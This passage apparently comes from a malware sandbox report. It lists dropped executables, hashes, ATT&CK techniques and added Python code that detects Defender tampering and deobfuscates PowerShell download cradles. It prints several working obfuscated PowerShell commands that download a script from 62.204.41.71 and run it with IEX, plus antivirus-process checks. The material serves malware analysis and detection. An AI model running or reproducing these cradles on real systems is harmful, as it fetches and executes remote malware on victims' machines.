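FORFILES_RE = re.compile(r'\bforfiles(?:\.exe)?"?\s.*?/c\s+"(.*)"\s*$', re.I | re.S)
REG_ADD_RE = re.compile(r'\breg(?:\.exe)?"?\s+add\s+(?:"([^"]*)"|(\S+))(.*)', re.I | re.S)
REG_OPT_RE = re.compile(r'/(v|t|d)\s+(?:"([^"]*)"|(\S+))', re.I)
ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{8,})", re.I)
DEFENDER_POLICY = "\\policies\\microsoft\\windows defender\\"


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text; None if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify_defender_policy(key: str, value: str, data: str) -> Optional[str]:
    """Describe a write under the Defender policy hive, or None if elsewhere."""
    k = key.lower()
    if DEFENDER_POLICY not in k:
        return None
    sub = k.split(DEFENDER_POLICY, 1)[1]
    if sub.startswith("exclusions"):
        return "exclusion added for " + value
    if sub == "spynet" and value.lower() == "spynetreporting" and data == "0":
        return "cloud (MAPS) reporting disabled"
    return "Defender policy modified"


def analyze(cmd: str) -> List[Dict]:
    out: List[Dict] = []
    m = MPPREF_RE.search(cmd)
    if m:
        for kind, quoted, bare in EXCL_OPT_RE.findall(m.group(1)):
            out.append({"type": "defender_exclusion", "via": "Add-MpPreference",
                        "kind": kind, "value": quoted or bare})
    m = FORFILES_RE.search(cmd)
    if m:
        # forfiles /c runs the quoted command once per matched file; matching the
        # single file cmd.exe turns it into a proxied shell. Unescape \" and
        # follow each "&"-chained command as if it were its own event.
        inner = m.group(1).replace('\\"', '"')
        out.append({"type": "lolbin_proxy", "tool": "forfiles", "inner": inner})
        for part in inner.split("&"):
            if part.strip():
                out.extend(analyze(part.strip()))
        return out
    m = REG_ADD_RE.search(cmd)
    if m:
        key = m.group(1) or m.group(2)
        opts = {k.lower(): (q or b) for k, q, b in REG_OPT_RE.findall(m.group(3))}
        effect = classify_defender_policy(key, opts.get("v", ""), opts.get("d", ""))
        if effect:
            out.append({"type": "defender_policy_write", "key": key, "value": opts.get("v", ""),
                        "data": opts.get("d", ""), "effect": effect,
                        "view": "64-bit" if "/reg:64" in cmd.lower() else "32-bit"})
    m = ENC_RE.search(cmd)
    if m:
        out.append({"type": "encoded_powershell", "decoded": decode_encoded_command(m.group(1)),
                    "scheduled": "/create" in cmd.lower()})
    return out


def analyze_all(events: List[str]) -> List[Dict]:
    return [f for cmd in events for f in analyze(cmd)]


if __name__ == "__main__":
    for f in analyze_all(EVENTS):
        print(f)
```

On the task line the encoded command decodes to `start-process -WindowStyle Hidden gpupdate.exe /force`. A forced Group Policy refresh is consistent with the preceding writes going to the Policies hive rather than to the live Defender configuration: the exclusion and the SpyNet switch become effective once policy is re-applied. Hunting for this on a live host means checking both Get-MpPreference output and the HKLM\SOFTWARE\Policies\Microsoft\Windows Defender subtree, since an exclusion written as policy does not show up where an Add-MpPreference one does.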
-
C:\Users\Admin\Documents\cE8kh8YndrJJjfgDiRSXHBuB.exe"C:\Users\Admin\Documents\cE8kh8YndrJJjfgDiRSXHBuB.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 6244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 6444⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 6524⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 5924⤵
- Program crash
-
C:\Users\Admin\Documents\_XfxA3EI0PT3ie5OHUHFQLMm.exe"C:\Users\Admin\Documents\_XfxA3EI0PT3ie5OHUHFQLMm.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"4⤵
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e file.zip -p320791618516055 -oextracted5⤵
-
C:\Users\Admin\Documents\UkPQqosaxZEWN_UuknyJ6RgF.exe"C:\Users\Admin\Documents\UkPQqosaxZEWN_UuknyJ6RgF.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\LPej8ron26c7SWsJgrCsKxFE.exe"C:\Users\Admin\Documents\LPej8ron26c7SWsJgrCsKxFE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5304 -s 4604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5304 -s 4684⤵
- Program crash
-
C:\Users\Admin\Documents\8RKZYsnKNWccv71JTmpromDN.exe"C:\Users\Admin\Documents\8RKZYsnKNWccv71JTmpromDN.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\y8vAvBD8LNXIpwE1EDcwkL93.exe"C:\Users\Admin\Documents\y8vAvBD8LNXIpwE1EDcwkL93.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6140 -s 20605⤵
- Program crash
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX4⤵
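The four PowerShell lines above, and the same four under BKq0ajiZJzEbtqBPqp6wgyDQ.exe earlier in the tree, are one download cradle with the URL swapped: three single-quoted fragments are joined with -Join '', the junk token {NAN} is stripped with .replace(), and the result is run with IEX, whose output (the fetched script) is piped into a second IEX. As an added example, not part of this report or of the malware, the Python below reverses that obfuscation generically (any fragment names, any join order, any junk token) and extracts the URLs from a batch of command lines; two of the page's lines are used as input together with one benign PowerShell line as a control. The regexes and the control line are assumptions of the example.

```python
"""Deobfuscation of the split-string PowerShell download cradle.

Added example, not part of this report or of the malware. The cradle seen
repeatedly in the process tree above builds
(New-Object Net.WebClient).DownloadString('<url>') from three single-quoted
fragments, joins them with -Join '', strips the junk token {NAN} with
.replace(), and executes the result with IEX, piping the fetched script
into a second IEX. The helper reverses those steps generically: any
fragment names, any -Join order, any junk token. Regexes and the benign
control line are assumptions of this example.
"""
import re
from typing import Dict, List

# Constructed input: two cradle command lines copied from this report and
# one benign PowerShell line as a control.
SAMPLES: List[str] = [
    r"""
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
""".strip(),
    r"""
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
""".strip(),
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process | Sort-Object CPU',
]

# PowerShell single-quoted literal; a doubled '' inside it is an escaped quote.
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'")
JOIN_RE = re.compile(r"\(\s*((?:\$\w+\s*,\s*)+\$\w+)\s+-join\s+''\s*\)", re.I)
REPLACE_RE = re.compile(r"\.replace\(\s*'((?:[^']|'')+)'\s*,\s*''\s*\)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)
INVOKE_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
DOWNLOAD_RE = re.compile(r"\.download(?:string|file|data)\s*\(", re.I)


def _unquote(s: str) -> str:
    return s.replace("''", "'")


def deobfuscate(cmdline: str) -> Dict:
    """Rebuild the joined string, drop the junk token, pull out URLs."""
    fragments = {name: _unquote(val) for name, val in ASSIGN_RE.findall(cmdline)}
    m = JOIN_RE.search(cmdline)
    # Honour the -Join order; fall back to assignment order if there is none.
    order = re.findall(r"\$(\w+)", m.group(1)) if m else list(fragments)
    payload = "".join(fragments.get(name, "") for name in order)
    junk = [_unquote(t) for t in REPLACE_RE.findall(cmdline)]
    for token in junk:
        payload = payload.replace(token, "")
    return {
        "payload": payload,
        "junk_tokens": junk,
        "urls": URL_RE.findall(payload),
        "downloads": bool(DOWNLOAD_RE.search(payload)),
        "invokes_expression": bool(INVOKE_RE.search(cmdline)),
    }


def is_download_cradle(cmdline: str) -> bool:
    """True when the rebuilt string downloads and the line hands it to IEX."""
    r = deobfuscate(cmdline)
    return r["downloads"] and r["invokes_expression"]


def extract_iocs(cmdlines: List[str]) -> List[str]:
    """Sorted, de-duplicated URLs recovered from a batch of command lines."""
    return sorted({u for c in cmdlines for u in deobfuscate(c)["urls"]})


if __name__ == "__main__":
    for line in SAMPLES:
        r = deobfuscate(line)
        print(is_download_cradle(line), r["payload"] or "<no fragments>")
    print(extract_iocs(SAMPLES))
```

Rebuilding the string, rather than pattern-matching the obfuscated form, is what makes this robust to the next build that renames $c1/$c4/$c3 or changes the junk token; the rebuilt payload is also what a DownloadString/IEX signature should be run against, since the original command line contains neither string intact.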
-
C:\Users\Admin\Documents\g5B8YLScVV_0zfy7P6hxlaVs.exe"C:\Users\Admin\Documents\g5B8YLScVV_0zfy7P6hxlaVs.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\aCtrrIoeuw8gN6TISehzPUES.exe"C:\Users\Admin\Documents\aCtrrIoeuw8gN6TISehzPUES.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\UTyTq8w2BBV94iBaBtwpceVf.exe"C:\Users\Admin\Documents\UTyTq8w2BBV94iBaBtwpceVf.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\UTyTq8w2BBV94iBaBtwpceVf.exe"C:\Users\Admin\Documents\UTyTq8w2BBV94iBaBtwpceVf.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 6082⤵
- Program crash
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3324 -ip 33241⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2008 -ip 20081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4764 -ip 47641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5304 -ip 53041⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif1⤵
-
C:\Windows\SysWOW64\cmd.execmd2⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"3⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"3⤵
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"3⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5284 -ip 52841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5284 -s 4601⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5344 -ip 53441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4764 -ip 47641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5304 -ip 53041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5284 -ip 52841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2008 -ip 20081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4596 -ip 45961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5072 -ip 50721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5344 -ip 53441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6928 -ip 69281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4500 -ip 45001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 6556 -ip 65561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 4500 -ip 45001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5320 -ip 53201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6780 -ip 67801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5344 -ip 53441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 4641⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 6556 -ip 65561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5448 -ip 54481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 6928 -ip 69281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 7668 -ip 76681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 6944 -ip 69441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 6780 -ip 67801⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 5312 -ip 53121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6780 -ip 67801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 6592 -ip 65921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 6780 -ip 67801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 2824 -ip 28241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 6140 -ip 61401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5344 -ip 53441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 8184 -ip 81841⤵
-
C:\Windows\SysWOW64\snwpteqq\vntucuvk.exeC:\Windows\SysWOW64\snwpteqq\vntucuvk.exe /d"C:\Users\Admin\kxplxqt.exe"1⤵
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 6780 -ip 67801⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 4880 -ip 48801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 5388 -ip 53881⤵
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service (2)
- New Service (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
Defense Evasion
- Modify Registry (3)
- Disabling Security Tools (1)
- Install Root Certificate (1)
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5    54e9306f95f32e50ccd58af19753d929
SHA1   eab9457321f34d4dcf7d4a0ac83edc9131bf7c57
SHA256 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72
SHA512 8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5    d76cb0dcfe4e83ca0480818fa1a2ac61
SHA1   bfe449f0ca852d4827911b08281c8bc643b9d204
SHA256 13deaa0dd2ec7dfe8a62953a43e327c07c2f1f4fad04da083cd772a1b7fbac0d
SHA512 c57a9f62e2c79675d9cf1a7e5fda0f4bcf40a8d2d29d186ca830b2ac616420a4361eeb57ab882e6878eb56faae4062bd4f02fb2ab081480a19b92ebd1a774abe
-
C:\Users\Admin\AppData\Local\Temp\Complete.exe
MD5    92acb4017f38a7ee6c5d2f6ef0d32af2
SHA1   1b932faf564f18ccc63e5dabff5c705ac30a61b8
SHA256 2459694049abfe227ddcf5b4d813fe3ae8e1e9066de5228acf20c958d425c2e1
SHA512 d385b2857d934628e1df3ef493b3a33e2a042c5974d9c153c126a86a28fc61bcc02db0a0791c225378994737a16cd35b74f217600d4b837cda779200c9faeb73
-
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5    2d0217e0c70440d8c82883eadea517b9
SHA1   f3b7dd6dbb43b895ba26f67370af99952b7d83cb
SHA256 d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01
SHA512 6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5    b89068659ca07ab9b39f1c580a6f9d39
SHA1   7e3e246fcf920d1ada06900889d099784fe06aa5
SHA256 9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c
SHA512 940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52
-
C:\Users\Admin\AppData\Local\Temp\Info.exe
MD5    f67ac68040dcf6a7c499bbc0d149397d
SHA1   4e61f7ca82126d8aab52a1881965d1ed38f93769
SHA256 7b8a8c6b1b0bf9d637c94f73d189f81398837eaa1d9cd431eeff6e7a398a32b4
SHA512 4398c085593c7756257dd3eaf859b5e16a393280d2bd2601902c3e44453ad77748a32c95ee9c5ceaf998ebb4b23ab3a9d235351865d2ffe33387657102b61719
-
C:\Users\Admin\AppData\Local\Temp\Install.exe
MD5    41b7c6d48d13e1a864bf2d3759e257e6
SHA1   7ee45121a927d744941651bd6673d3df21f1611b
SHA256 820c980f68378170cec0e1f2f4e2e319a07b1d030d7712ece110f579fcd1a8c2
SHA512 0ac230d6ea4f7eaf1c5dbc919e1de41416e4c5e527e0ec583135eab2067d0fcd22615d80a93f803ce327cdbb58b5b236ca47d759647b8c36a98a17a3e1504077
-
C:\Users\Admin\AppData\Local\Temp\Install_Files.exe
MD5    509b000635ab3390fa847269b436b6ba
SHA1   cc9ea9a28a576def6ae542355558102b6842538b
SHA256 7266a9d0f9a50aff61cc32794e421c4215e49e0b54c6b90e13ae05a8a8e5fc12
SHA512 c64d0cabeede0f3617d3535767637d8ffc7dc51145f2e2db48b6f720dfe76e2e897e456f91c83235b1b5c9833e468244f2fe67379c0da47b9ea045b1362cebd4
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
MD5    0aaae9372871c955a8ab58a6fa7637f0
SHA1   c62a20c20627807e6ea5f5853315f1cd1445b490
SHA256 6c9500d159ff494da2ef19e0d9a4cd38648b167dec89d6f8a8ae017819d5c294
SHA512 0722cff7d0303fa8031482d08a61d359a8339408a9d16cf28e3138c3da6770ddc87368356d67d6d07f0e2bf8491669979c9189d233393bf65a19716fde26b8a5
-
C:\Users\Admin\AppData\Local\Temp\Litever01.exe
MD5    e9a463872981c78684c37853290bc583
SHA1   eb9c029ade89355575881d6611118590534d9b0f
SHA256 2d63e74b88d671218c2cdd218347afbb363115d00be1463a9db7f3a4f4624ee0
SHA512 6dfef5cf78767c41cfd72c95ccdca31fb829ff44284fd14515d871c22eb1a0999d69971a7d53bc587a32168010dbd06a00477a4b3de7aab15fe16644fdba6617
-
C:\Users\Admin\AppData\Local\Temp\axhub.dat
MD5    5fd2eba6df44d23c9e662763009d7f84
SHA1   43530574f8ac455ae263c70cc99550bc60bfa4f1
SHA256 2991e2231855661e94ef80a4202487a9d7dc7bebccab9a0b2a786cf0783a051f
SHA512 321a86725e533dedb5b74e17218e6e53a49fa6ffc87d7f7da0f0b8441a081fe785f7846a76f67ef03ec3abddacbe8906b20a2f3ce8178896ec57090ef7ab0eb7
-
C:\Users\Admin\AppData\Local\Temp\axhub.dll
MD5    1c7be730bdc4833afb7117d48c3fd513
SHA1   dc7e38cfe2ae4a117922306aead5a7544af646b8
SHA256 8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1
SHA512 7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e
-
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
MD5    b7161c0845a64ff6d7345b67ff97f3b0
SHA1   d223f855da541fe8e4c1d5c50cb26da0a1deb5fc
SHA256 fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66
SHA512 98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680
-
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
MD5    eed40acf4703986a80f00ec41c6949fe
SHA1   3184a7c0fb0b705a9607d5a0b9b2beb80f6b60fc
SHA256 d6a9f4d0e28e490da5dddaa597518fc0d8fefca03932c94457785aec4f3ddbf5
SHA512 ec49b4eeff25d8c58d47aadcc6f560c353c5bd0dee6f49be71587432c9c1b560664abc9d23496e6a08e657a5a2d802f663373e4004299672b283b5de028610ba
-
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
MD5    6bb2444563f03f98bcbb81453af4e8c0
SHA1   97f7d6c15d2a1cd34d32e6d6106fcf5e8a0515ed
SHA256 af1beafe8b2042586f291bd09192e420349c87bfaf48233c9ae5ceae4b19df4d
SHA512 dbf81f69c4e9086cf6da8e83f3f32346e44a590d4c037c02c83a5e3af2f666dec0a00a4eb296c90d54a4231b8060b76cf26147f4bb78b6e04d6009c77082be36
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5    7fee8223d6e4f82d6cd115a28f0b6d58
SHA1   1b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256 a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA512 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5    a6279ec92ff948760ce53bba817d6a77
SHA1   5345505e12f9e4c6d569a226d50e71b5a572dce2
SHA256 8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512 213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c
-
